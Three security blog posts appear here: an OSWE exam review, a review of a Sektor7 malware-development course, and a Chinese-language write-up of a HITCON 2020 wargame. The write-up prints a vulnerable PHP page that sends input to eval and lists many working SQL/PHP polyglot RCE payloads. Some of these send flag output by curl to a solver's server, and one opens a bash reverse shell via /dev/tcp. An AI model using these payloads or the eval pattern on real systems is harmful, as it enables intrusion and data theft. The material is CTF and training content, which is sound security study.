I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials) I honestly watched the videos 3 times and still didn’t really grasp how I would have been able to achieve such madness start to finish and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what were the high level steps to achieve authentication bypasses, what did I exploit to get RCEs, what was the syntax of the commands I used, what did I screw up on or miss that I should be on the lookout for if I come across similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both maybe in like a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and you say to yourself , “I knew that or I would have been able to figure that out”. With no solutions your are on your own and at the mercy of your own brain. Again, like the black-box from the lab the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on a exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from black-box perspective since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source-code responsible for processing that input then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zin a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc). I spend majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally there’s things that I don’t control fully but have some control of (certification exams). For these I shift my goal not to passing but giving my absolute max, trying my best and if I come up short I still achieve my goal. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations. It’s when your back is against the wall that determines your resiliency not when things are rosy. I’m a little nervous for the unknown, the shock factor. My only hope was that when I gained access to the exam that it didn’t feel like I had been studying for a different certification.

Day1 – 04:30 a.m I get out the bed since my mind has been racing for a half hour already. I watched the lab videos of exercises I thought were relevant. Ensured my notes were organized once more and wrote myself some positive notes in size 50 font bolded. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day1 – 09:45 a.m I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here but after connecting to the exam VPN I was provided 2 web application and their source-code. The Control Panel provided details and instructions on how to access each, the point breakdown and what constituted successful compromise. The proctor has no audio, you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day1 – 10:00 a.mI’m off to the races. I went to the homepage of the first application to see what type of application it was then directly to the source-code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8hours 53 Minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours, rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. I took one break of 30 minutes to eat in that time to get the first authentication bypass.

Day1 – 10:00p.m Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things being tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day2 – 12:00a.m – I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hour 15 minutes)
Box-2 Start

Day2 – 04:00a.m – What is up with me and 4 am but anyway that 4 hours felt marvelous and I felt like a tiger waking up! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day2 – 2:23p.m – I noticed the authentication bypass for this one in less than a half hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day2 – 05:00p.m – RCE done! Although I have all the points now I also have a very important upcoming week at work and although I could wait until tomorrow (Monday) after work to write the report my exam time expires at 10am Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day2 – 7:00p.m – I had been taking screenshots throughout but I noticed how much I didn’t grab when I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME you do not want to get lazy on the report after you’ve done the exam because they will fail you without hesitation! There are plenty of horror stories. Myself being a former penetration tester and have gone through a couple Offensive Security certificates before I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology to achieve compromise along with your attack code. I provided everything, what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in your brain during a 48 exam.

Day3 – 12:00a.m – I proofread the report with glossy eyes 4 times, completed the process of uploading the exam reports. After I got the confirmation email I went to bed.

I had to wait an entire 5 days from Sunday night -> Friday to receive my results that I had achieved the OSWE certification 👏🏽

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly. In interpreted languages adding print statements. In compiled languages actually stepping over/in methods examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

  • Examine unauthenticated areas of the source-code first
  • Leverage Visual Studio Code Remote SSH Extension
    • Understand the launch_json files in Visual Studio Code
  • Examine the routes to see all the endpoints. Understand the authorization applied to each
  • Review the controllers to understand how user input is handled by the application
  • If possible, always enable database query logging
  • DnsSpy to decompile .NET, JDGui for Java
  • After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
  • Investigate how sanitization of user input is performed. Is it done using a trusted, opensource library, or is a custom solution in place
  • When auditing realize which code you can reach regardless of conditionals, loop

Potential Authentication Bypass Techniques

  • SQLi
    • Can we create a user account
    • Can we leak hashed passwords, reset tokens an other information to aid in authentication bypass
  • Broken Authentication
    • Does authentication depend on private information that we can leak from DB using above
  • Regular – Time Based – Boolean Based (examples and templates for each)
  • PHP Type Juggling
  • Reading Arbitrary Files w/ XXE
  • XSS -> CSRF (Session Hijacking or Session Riding)

Potential Remote Command/Code Execution

  • Code Injection (Eval – Node.js)
  • Deserialization Bugs (Java .Net)
  • SSTI
  • Unrestricted File Upload

Hail Mary

  • User Defined Functions
  • 3rd Party Frameworks & Libraries
  • APIs
  • Client Side Attacks
  • Reversing Authentication
  • Brute Forcing Tokens
  • JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

  • Offensive Security provides you with everything you need to pass the exam but you will also learn new things during the exam
  • I didn’t feel the pain folks were experiencing about latency. I did not touch their Kali instance
  • Be ready to be rattled. Things aren’t in the regular places, named differently, paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/Powershell System Administration knowledge is your friend – grep, find, writing regular expressions and locating processes
  • Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice be sure to know requests inside & out and in particular the session object!
  • Setup local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port> and in another python main.py 192.168.1.1  and you receive a shell
  • Go through all the modules and where Offensive Security says, “after some time we zeroed in on this class” actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh they only had 40 results I would been able to filter through those until it’s time to do that”

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course I had a good time and positive experience. No course is perfect so I don’t knit-pick. Some things exceeded my expectation some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

  • Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!

 

  • SANs 642 London December 2020 😛 Shoutout to my boss! He kept a SANs voucher for me on ice which I graciously used the day after submitting my OSWE report #whatbreak
  • I am waiting until the new Offensive Security Exploit Development course comes out early 2021. I’m more interested in that than the PEN-300 they just dropped.

 

The post OSWE Review (AWAE Course) appeared first on Certification Chronicles.

A Review of the Sektor7 RED TEAM Operator: Malware Development Intermediate Course

30 October 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Intermediate Course

Introduction

I recently completed the newest Sektor7 course, RTO: Malware Development Intermediate. This course is a followup to the Essentials course, which I previously reviewed here. If you read my Essentials review, you know that I am a big fan of Sektor7 courses, having completed all 4 that they offer. This course is easily as good as the others, and probably my favorite one yet.

Course Overview

This course builds on the material in the Essentials course, covering more advanced topics and a wider range of techniques. You don’t need to have taken the Essentials course, but it will be easier if you have taken it or already have background knowledge in C, Windows APIs, code injection, DLLs, etc. This is not a beginner course, but the code is well commented and the videos explain the concepts and what the code is doing very well, so with some effort you’ll probably be OK.

Here’s what the Intermediate covers, according to the course page:

- playing with Process Environment Blocks and implementing our own function address resolution
- more advanced code injection techniques
- understanding how reflective binaries work and building custom reflective DLLs, either with source or binary only
- in-memory hooking, capturing execution flow to block, monitor or evade functions of interest
- grasping 32- and 64-bit processing and performing migrations between x86 and x64 processes
- discussing inter process communication and how to control execution of multiple payloads

Module 1: PE Madness

The course begins like Essentials, with a link to the code and a custom VM with all the tools you’ll need. It then does a deep dive into various aspects of the PE format. It’s not comprehensive, which is not surprising if you’ve ever parsed PE headers, but it covers the relevant parts quite well, and in a visual, easy to grasp way thanks to PE-Bear. The main takeaway is understanding the PE header well enough to dynamically resolve function addresses, a technique that is used later to reduce function imports, and to perform reflective DLL injection. I already have some experience with PE parsing, but it’s a foundational topic and seeing someone else’s approach and explanations is always helpful. Getting a deeper dive into PE-Bear’s capabilities is a nice bonus as well.

Next this module covers a custom implementation of GetModuleHandle and GetProcAddress, leveraging the previously covered PE parsing knowledge. This is done to reduce the number of suspicious API calls in the import table, and a code sample is provided to create a PE file with no import table at all.

Module 2: Code Injection

The second module covers five different shellcode injection techniques. The first is the classic OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread chain, with some variations thrown in when creating the remote thread. Next is a common thread hijacking technique using Get/SetThreadContext. Third is a different memory allocation method that takes advantage of mapping section views in the local and remote processes, ala Urban/SeasideBishop. The last two methods make use of Asynchronous Procedure Calls (APCs), covering both the standard OpenProcess/QueueUserAPC method and the “Early Bird” suspended process method. All five methods use AES encrypted shellcode and obfuscate some function calls using the custom GetModuleHandle and GetProcAddress implementations form Module 1.

Module 3: Reflective DLLs

This section was one of my favorites, as I didn’t have a lot of experience with reflective DLL injection. It covers the classic Stephen Fewer ReflectiveLoader method to create a self-loading DLL and inject it into a remote process without needing to touch disk. The previously covered PE parsing is essential for understanding this part. Also covered is shellcode Reflective DLL Injection (sRDI), by monoxgas, which allows you to convert a compiled DLL into shellcode and inject it. These two techniques are combined to enable the reflective injection of DLLs that you may not have the source for or do not have a reflective loader function exported.

Module 4: x86 vs x64

This was my other favorite section, as it was another area I didn’t have a ton of prior experience with. It covers Windows on Windows 64 (WOW64), how 32-bit processes run on modern x64 Windows, and the ins and outs of injecting between x86 and x64 processes. It touches on Heaven’s Gate, not in extreme detail, as it’s a pretty deep topic that needs a fair bit of background to fully grasp, but enough to get the gist and to be able to make use of it in practice. Templates are provided that use shellcode from Metasploit (also written by Stephen Fewer) to transition from x86 to x64 and inject from a 32-bit process into a 64-bit process, courtesy of some of the code injection techniques from Module 2.

Module 5: Hooking

Module 5 covers three different methods of performing function hooking. It starts with the well-known Microsoft Detours library, which makes hooking different functions a breeze. The second method is Import Address Table (IAT) hooking, which again uses PE parsing knowledge from earlier in the course. The last method was my favorite, as I’d not played with it in the past. It involves inline patching of function addresses. All three methods come with the usual well-commented code samples for easy modification.

Module 6: Payload Control via IPC

This was a short but sweet section on controlling the number of concurrently running payloads. The idea is to check if your implant is already running on a target machine, and bail out if it is. This is useful in persistence scenarios where your chosen persistence method may trigger your payload or shell multiple times. It works by creating a uniquely named instance of one of four different synchronization primitives: mutexes, events, semaphores, or named pipes. A check is performed when initializing the implant, and if one of the uniquely named objects exists, then another instance of the implant must already be running, so the current one exits. Malware is also known to use this trick, as well as legitimate applications that don’t allow multiple concurrent running instances.

Module 7: Combined Project

The combined project makes use of most of the previous modules and puts them together to emulate a somewhat real-world scenario: stealing the password of a VeraCrypt volume via API hooking. I really liked this section as it applied the learned concepts in a cohesive way into a project that you could conceivably see in real life. Some additional requirements are in place, namely needing to inject reflective DLLs and cross from x86 to x64. There are also some suggested followup assignments to expand and improve upon the final project and make it stealthier.

Takeaways

I really liked this course a lot, as I expected to from my past experience with Sektor7 courses. I already had experience with most of the topics, but the clarity with which the topics are presented and the supplied working code samples really solidified what I already knew and taught me a fair bit that I didn’t. I can’t stress enough how helpful the code samples are, as I find the best way for me to learn a new technique is to have a very simple working version to wrap my head around, and then slowly start to add features or make it more advanced. The samples in this course, as well as the other Sektor7 courses, do this very well. They aren’t the most cutting edge, and they won’t beat AV out of the box, but that’s not their purpose. They are teaching tools, and excellent ones at that.

I want to talk a bit about how to get the most value out of this and other Sektor7 courses. It might be easy to just watch the videos, compile the examples, and think “huh, that’s it?”. The real value is having clear explanations of code samples, and then taking that code, playing with it, and making your own. In the Essentials course, I looked up every API call and function I wasn’t familiar with on MSDN and added it as a comment in the code. I made sure I understood exactly what each line did and why. I was familiar with all of the APIs in this course, but even before beginning the videos for a module, I read the code and tried to already have an understanding of it before it was explained. These courses have a lot to give you, as long as you put in your share of effort with the code.

Conclusion

As I’ve said already, I really liked this course. I picked up new knowledge and skills that I can immediately use at work, I have solid code samples to build from, and it didn’t break the bank. You can’t ask for much more from an offensive security course. Props again to reenz0h and the Sektor7 crew. I’m really hoping there will be an advanced course and beyond in the future.

DEVCORE Wargame at HITCON 2020

29 October 2020 at 16:00

搭晚安~一年一度的資安圈大拜拜活動之一 HITCON 2020 在約一個月前順利落幕啦,今年我們照舊在攤位準備了幾道小小的 Wargame 給會眾朋友們挑戰自身技術,並同樣準備了幾份精美小禮物送給挑戰成功的朋友們。

總計活動兩天間有登入並提交至少一把 flag 的人數為 92 人,非常感謝大家踴躍地參與,這次未能成功在時間內完成挑戰而未領到小禮物的朋友們也別太灰心,為了能更多的回饋社群,所以我們決定寫一篇技術文章介紹本次 Wargame 的其中一道開放式題目sqltest,為此我們在活動後詢問了所有解題的人,收集了大家的解法與思路,並將在文章的接下來一一為大家介紹!

sqltest 題目說明

這道題目主要核心的部分就這 3 個檔案:Dockerfile、readflag.c 和 index.php。讓我們先看看前兩個檔案,可以從下方的 Dockerfile 中先觀察到 flag 被放置在檔案 /flag 之中,但權限被設定為僅有 root 可以讀取,另外準備了具有 setuid 權限的執行檔 /readflag,讓任何人均可在執行此檔案時偽裝成 root 身分,而 /readflag 的原始碼就如下方 readflag.c 所示,很單純的讀取並輸出 /flag 檔案內容,這個配置就是一個很標準以 getshell 為目標的 Wargame 題目。

Dockerfile

FROM php:7.4.10-apache

# setup OS env
RUN apt update -y
RUN docker-php-ext-install mysqli
RUN docker-php-ext-enable mysqli

# setup web application
COPY ./src/ /var/www/html/

# setup flag
RUN echo "DEVCORE{flag}" > /flag
RUN chmod 0400 /flag
RUN chown root:root /flag
COPY readflag.c /readflag.c
RUN gcc -o /readflag /readflag.c
RUN chmod 4555 /readflag

readflag.c

#include <stdio.h>
#include <stdlib.h>

void main() {
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);

    system("/bin/cat /flag");
}

上述前半部為環境的佈置,真正題目的開始則要見下方 index.php,其中 $_REQUEST 是我們可以任意控制的參數,題目除了 isset 外並無其他任何檢查,隨後第 8 行中參數被帶入 SQL 語句作執行,如果 SQL 執行成功並且有查詢到資料,就會進入 15 行開始的處理,來自 $_REQUEST$column 變數再次被使用並傳入 eval 作執行,這樣看下來題目的解題思路就很清楚了,我們需要構造一個字串,同時為合法的 SQL 語句與 PHP 語句,讓 SQL 執行時有回傳值且 PHP 執行時能夠執行任意系統指令,就能 getshell 並呼叫 /readflag 取得 flag!

index.php

<?php
if (!isset($_REQUEST["column"]) && !isset($_REQUEST["id"])) {
    die('No input');
}

$column = $_REQUEST["column"];
$id = $_REQUEST["id"];
$sql = "select ".$column." from mytable where id ='".$id."'" ;

$conn = mysqli_connect('mysql', 'user', 'youtu.be/l11uaEjA-iI', 'sqltest');

$result = mysqli_query($conn, $sql);
if ( $result ){
    if ( mysqli_num_rows($result) > 0 ) {
        $row = mysqli_fetch_object($result);
        $str = "\$output = \$row->".$column.";";
        eval($str);
    }
} else {
    die('Database error');
}

if (isset($output)) {
    echo $output;
}

出題者解法

身為出題者,當然必須先拋磚一下才能夠引玉~

exploit:

QueryString: column={passthru('/readflag')}&id=1

SQL: SELECT {passthru('/readflag')} FROM mytable WHERE id = '1'
PHP: $output = $row->{passthru('/readflag')};

這個解法利用了 MySQL 一個相容性的特性,{identifier expr} 是 ODBC Escape 語法,MySQL 相容了這個語法,使得在語句中出現時不會導致語法錯誤,因此我們可以構造出 SELECT {passthru '/readflag'} FROM mytable WHERE id = '1' 字串仍然會是合法的 SQL 語句,更進一步地嘗試將 ODBC Escape 中的空白移除改以括號包夾字串的話,會變成 SELECT {passthru('/readflag')} FROM mytable WHERE id = '1',由於 MySQL 提供的語法彈性,此段語句仍然會被視為合法並且可正常執行得到相同結果。

接著再看進到 eval 前會構造出這樣的 PHP 語句:$output = $row->{passthru('/readflag')},由於 PHP 在語法上也提供了極大的彈性,使得我們可以利用 $object->{ expr } 這樣的語法將 expr 敘述句動態執行完的結果作為物件屬性名稱去存取物件的屬性,因此結果就會呼叫 passthru 函式執行系統指令。

這邊補充一個冷知識,當想到系統指令時,大家直覺可能會想到使用 system 函式,但是 MySQL 在 8.0.3 中將 system 加入關鍵字保留字之中,而這題目環境是使用 MySQL 8.0 架設的,所以如果使用 system 的話反而會失敗唷!

來自會眾朋友們的解法

由於朋友們踴躍提交的解法眾多,所以我們將各解法簡單做了分組,另外提醒一下,以下順序只是提交的先後時間差,並無任何優劣,能取得 flag 的解法都是好解法!接下來就讓我們進行介紹吧。

ODBC Escape

by Mico (https://www.facebook.com/MicoDer/):

QueryString: column={exec(%27curl%20http://Mico_SRV/?`/readflag`%27)};%23&id=1

SQL: SELECT {exec('curl http://Mico_SRV/?`/readflag`')};# FROM mytable WHERE id = '1'
PHP: $output = $row->{exec('curl http://Mico_SRV/?`/readflag`')};#;

這個解法與出題者的十分類似,但沒有使用可以直接輸出結果的 passthru 而是改用 exec,接著透過 curl 把結果回傳至自己的伺服器,據本人說法是因為「覺得駭客就該傳些什麼回來自己Server XD 」XD。

Comment Everywhere

幾乎所有程式語言都有註解符號可以讓開發人員在程式碼中間加上文字說明,以便下一個開發人員接手時可以快速理解這段程式碼的意義。當然 SQL 與 PHP 也有各自的註解符號,但它們所支援的符號表示稍微有些差異,而這小差異就可以幫助我們達成目的。

by LJP (https://ljp-tw.github.io/blog/):

QueryString: column=id%0a-- /*%0a-- */ ; system('/readflag');%0a&id=1

SQL: SELECT id
     -- /*
     -- */ ; system('/readflag');
     FROM mytable WHERE id = '1'
PHP: $output = id
     -- /*
     -- */ ; system('/readflag');
     ;

這個解法看似複雜,本質上其實很單純,就是利用兩個語言支援不同註解符號的特性。對於 SQL 而言,-- 是註解符號,會無視後方所有到換行為止的文字,所以每一行以 -- 開頭的字串,SQL 是看不見的。接著來看 PHP,對於 PHP 而言,/* 任何字串 */ 這是註解的表示方式,開頭結尾由 / 與 * 組成,中間被包夾的字串是看不見的,並且支援換行,而 -- 在 PHP 之中則代表遞減運算子,所以如 $output -- 字串其實是在對 $output 進行減 1 的操作。綜合上面特性,對於上面的解法,其實只有 PHP 看見的第三行 ` ; system(‘/readflag’);` 會認為是需要執行的程式碼,其餘部分不論是 SQL 還是 PHP 都以為是註解的字串而無視,因此可以順利執行取得 flag。

by ankleboy (https://www.facebook.com/profile.php?id=100001963625238):

QueryString: column=name%20/*!%20from%20mytable%20*/%20--%20;%20system(%22/readflag%22)&id=1

SQL: SELECT name /*! from mytable */ -- ; system("/readflag") FROM mytable WHERE id = '1'
PHP: $output = $row->name /*! from mytable */ -- ; system("/readflag");

此解法也是同樣運用註解,但使用的註解符號似乎稍微特殊,/* */ 除了 PHP 之外,MySQL 也同樣支援此允許多行的註解符號,但假如多上一個驚嘆號 /*! */,事情就又稍微不同了,這是 MySQL 特有的變種註解符號,在此符號中的字串,仍然會被 MySQL 當成 SQL 的一部分執行,但在其他 DBMS 之中,因為是 /* 開頭就會認為它就是單純的註解文字而忽視,讓開發人員能撰寫可 portable 的程式碼。因此就能製造出一串註解文字可被 MySQL 看見但無法被 PHP 看見,強制在註解文字裡讓 SQL 構造合法語句,再利用 -- 註解閉合所有冗贅 SQL 語句,緊接著 -- 後就能撰寫任意 PHP 執行碼。

by FI:

QueryString: column=id/*!from mytable union select `/readflag`*/./*!id from mytable*/`/readflag`%23?>&id=1

SQL: SELECT id/*!from mytable union select `/readflag`*/./*!id from mytable*/`/readflag`#?> FROM mytable WHERE id = '1'
PHP: $output = $row->id/*!from mytable union select `/readflag`*/./*!id from mytable*/`/readflag`#?>;

同樣是利用 /*! */ 註解符號強行構造合法查詢,不過有趣的是,MySQL 支援 # 單行的註解符號,此註解符號同樣也被 PHP 支援,所以不會導致 PHP 語法錯誤,最後還多了 ?> 強行結束 PHP 程式區塊,冷知識是如果程式碼是 PHP 程式區塊內最後一行的話,不加 ; 並不會導致語法錯誤唷 :P

by tree:

QueryString: column=null--+.$output=exec('/readflag')&id=

SQL: SELECT null-- .$output=exec('/readflag') FROM mytable WHERE id = '1'
PHP: $output = $row->null-- .$output=exec('/readflag');

也是用了 -- 把 PHP 程式碼的部分在 SQL 裡面遮蔽起來,利用了 null 關鍵字讓 SQL 查詢有回傳結果,但在 PHP 之中卻變成 $row->null 對 $row 物件存取名為 null 的屬性,使得 PHP 也能合法執行,最後將指令執行結果覆蓋 $output 變數,讓題目幫助我們輸出結果。

by cebrusfs (https://www.facebook.com/menghuan.yu):

QueryString: column=NULL;%20--%20$b;var_dump(exec(%22/readflag%22))&id=1

SQL: SELECT column=NULL; -- $b;var_dump(exec("/readflag")) FROM mytable WHERE id = '1'
PHP: $output = $row->column=NULL; -- $b;var_dump(exec("/readflag"));

此解法也是類似的思路,運用 -- 閉合再湊出合法 PHP 程式碼,最後直接使用 var_dump 強制輸出 exec 的執行結果。

by Jason3e7 (https://github.com/jason3e7):

QueryString: column=NULL;-- $id %2b system('/readflag');%23&id=1

SQL: SELECT NULL;-- $id + system('/readflag');# FROM mytable WHERE id = '1'
PHP: $output = $row->NULL;-- $id + system('/readflag');#;

這也是相似的思路,有趣的是 -- $id 這個部分,大家一定記得 $id -- 是遞減運算子,但有時可能會忘記 -- $id 也同樣是遞減運算子,所以這個 -- 會使得 MySQL 認為是註解,PHP 卻仍認為是遞減運算子並正常執行下去。

by shoui:

QueryString: column=null-- -"1";"\$output = \$row->".system('/readflag').";";&id=1

SQL: SELECT null-- -"1";"\$output = \$row->".system('/readflag').";"; FROM mytable WHERE id = '1'
PHP: $output = $row->null-- -"1";"\$output = \$row->".system('/readflag').";";;

同樣運用註解 -- 閉合 SQL 但 PHP 又是遞減運算子的特性,而 system 又會將指令執行結果直接輸出,因此就能直接取得 flag。本人有補充說明當時測試時直接複製貼上原始碼那行接測試,後來使用 ?id=1&column=null-- -"1";" ".system('/readflag').";" 精簡後的 payload XD。

Double-quoted String Evaluation

PHP 會自動在由雙引號「”」包夾的字串中,尋找 $ 開頭的字詞,將其解析成變數再把值代入字串中,這個功能對於快速輸出已充分跳脫處理的變數值非常有幫助,可以增加程式碼可讀性;但同樣地,我們也可以利用這個功能做一下有趣的事情,例如這段 PHP 程式碼 $str = "${phpinfo()}"; 就可以直接執行 phpinfo 函式,利用 $str = "${system('id')}"; 就可以執行系統指令;而在 MySQL 中,雙引號「”」恰好也可以被用來表示純字串,所以我們就能構造出「MySQL 認為是純字串,PHP 卻認為需要解析執行」的 Payload。

讓我們先來看第一個例子:

by ginoah:

QueryString: column=id="${system('/readflag')}"&id=1

SQL: SELECT id="${system('/readflag')}" FROM mytable WHERE id = '1'
PHP: $output = $row->id="${system('/readflag')}";

對於 SQL 而言,就是回傳 id 與字串比較的結果;但對於 PHP 而言,上述結果是將雙引號字串解析完後才賦值給變數 $row->id,而結果就如同前面說的,它會執行系統指令 /readflag,還會將結果輸出至網頁,所以就能取得 flag!

by Billy (https://github.com/st424204):

QueryString: column=name%2b"{$_POST[1]($_POST[2])}"&id=1
POST: 1=system&2=/readflag

SQL: SELECT name+"{$_POST[1]($_POST[2])}" FROM mytable WHERE id = '1'
PHP: $output = $row->name+"{$_POST[1]($_POST[2])}";

同樣利用雙引號特性,但這個例子構造的較為複雜,利用了一些鬆軟特性,在 PHP 中,若字串變數是一個存在的函式的名稱,則我們可以利用 $func = 'system'; $func('id'); 這樣的方式來呼叫該變數,這個例子就是應用了這個特性,將我們從前端傳遞過去的 $_POST[1] 當成函式名稱、$_POST[2] 作為函式的參數執行,因此只要參數再帶上 1=system&2=readflag 就能取得 flag!

by Hans (https://hans00.me)

QueryString: column=id||"{$_POST['fn']($_POST['cmd'])}"&id=1
POST: fn=system&cmd=/readflag

SQL: SELECT id||"{$_POST['fn']($_POST['cmd'])}" FROM mytable WHERE id = '1'
PHP: $output = $row->id||"{$_POST['fn']($_POST['cmd'])}";

這個例子與前一個利用了同樣的特性,差別在與此處的 Payload 改用 OR 邏輯運算子 ||,而前面使用的是加法算術運算子 +,但結果都是相同的。

by Chris Lin (https://github.com/kulisu)

QueryString: column=TRUE/"${system(%27/readflag%27)}";%23&id=1

SQL: SELECT TRUE/"${system('/readflag')}";# FROM mytable WHERE id = '1'
PHP: $output = $row->TRUE/"${system('/readflag')}";#;

這也是用相同概念,前面改用除法算術運算子 /。看完解法才發現投稿者是同事!

Execution Operator

在 PHP 中存在眾多函式可以執行系統指令,其中還包括一個特殊的 Execution Operator,此運算子的形式是利用反引號「`」將字串包夾起來,這樣該字串就會被當作系統指令執行,其內部實際是執行 shell_exec,更貼心的事情是,這個運算子同樣支援 Double-quoted String Evaluation,所以若是 $cmd = 'id'; echo `$cmd`; 這樣的形式,PHP 就會先解析 $cmd 得出 id,再執行 id 系統指令;而在 MySQL 之中,反引號是用來表示一個 identifier,identifier 用來指示一個物件,最常見的是資料表或是資料欄,當我們執行 SELECT c FROM t,其中 c 和 t 就是 identifier,所以若想靠 Execution Operator 來執行指令,可能還必須同時讓 identifier 能夠被 MySQL 識別才行。

by dalun (https://www.nisra.net):

QueryString: column=id=`$_POST[1]`%23?>&id=%0a+from+(select+'id','$_POST[1]')+as+a+--+
POST: 1=/readflag

SQL: SELECT id=`$_POST[1]`#?> FROM mytable WHERE id = '
     from (select 'id','$_POST[1]') as a -- '
PHP: $output = $row->id=`$_POST[1]`#?>;

這個解法似乎是唯一願意使用 id 參數的 XD!在 column 參數用註解符號 # 閉合後續,在 id 參數插入換行符號並構造一個合法的 SQL,透過子查詢製造合法的 identifier,最後由 PHP 透過 execution operator 執行系統指令。

by HexRabbit (https://twitter.com/h3xr4bb1t):

QueryString: column=name+or+@`bash+-c+"bash+-i+>%26+/dev/tcp/1.2.3.4/80+0>%261"`&id=1

SQL: SELECT name or @`bash -c "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"` FROM mytable WHERE id = '1'
PHP: $output = $row->name or @`bash -c "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"`;

這個解法核心也是透過 execution oeperator 執行指令,不過用了一個特殊的字元 @。在 MySQL 中,這代表 user-defined variables,後面的字串則為變數的名稱,而且名稱可以使用特殊字元,只要使用 identifier 的符號 ` 把字串包夾起來即可,而存取不存在的變數並不會導致錯誤,MySQL 只會回傳 NULL 的結果。在 PHP 中的話,@ 代表 error control operator,可以放置在表達式前,會讓 PHP 將此表達式執行產生的錯誤訊息全部忽略,由於是表達式,所以也能附加在 execution operator 之前。最後這個解法再用 or 邏輯運算子(MySQL 與 PHP 皆支援並且意義相同)串接即可達成執行系統指令。

by cjiso1117 (https://twitter.com/cjiso)

QueryString: column=$a%2b`curl 127.0.0.1/$(/readflag)`/*!from (select "asd" as "$a", "qwe" as "curl 127.0.0.1/$(/readflag)" ) as e*/;%23&id=qwe

SQL: SELECT $a+`curl 127.0.0.1/$(/readflag)`/*!from (select "asd" as "$a", "qwe" as "curl 127.0.0.1/$(/readflag)" ) as e*/;# FROM mytable WHERE id = 'qwe'
PHP: $output = $row->$a+`curl 127.0.0.1/$(/readflag)`/*!from (select "asd" as "$a", "qwe" as "curl 127.0.0.1/$(/readflag)" ) as e*/;#;

同樣是利用 /*! */ 製造出 PHP 看不見、MySQL 看得見的註解文字來控制資料庫查詢結果,最後利用 execution operator 來達成執行系統指令,但由於 ` 內的文字會被 MySQL 認為是 identifier,找不到對應資源會導致錯誤,所以透過子查詢和 alias 語法強行製造出 identifier 讓查詢正確執行。本人表示一開始覺得用 /*! */ 會很帥,結果走偏繞了一大圈

by shik (https://github.com/ShikChen/)

QueryString: column=id%2b"${print_r(`/readflag`)}"&id=1

SQL: SELECT id+"${print_r(`/readflag`)}" FROM mytable WHERE id = '1'
PHP: $output = $row->id+"${print_r(`/readflag`)}";

這個解法利用加法運算子組合 id identifier 和雙引號字串,接著在雙引號字串利用 evaluation 特性執行 PHP 程式碼,透過 execution operator 執行系統指令後再以 print_r 強制輸出結果,取得 flag。

匿名:

QueryString: id=1&column=id%2b"${`yes`}"

SQL: SELECT id+"${`yes`}" FROM mytable WHERE id = '1'
PHP: $output = $row->id+"${`yes`}";

另外還收到一個匿名提交的解法,思路與前面相同,總之就也附上來了~。

結語

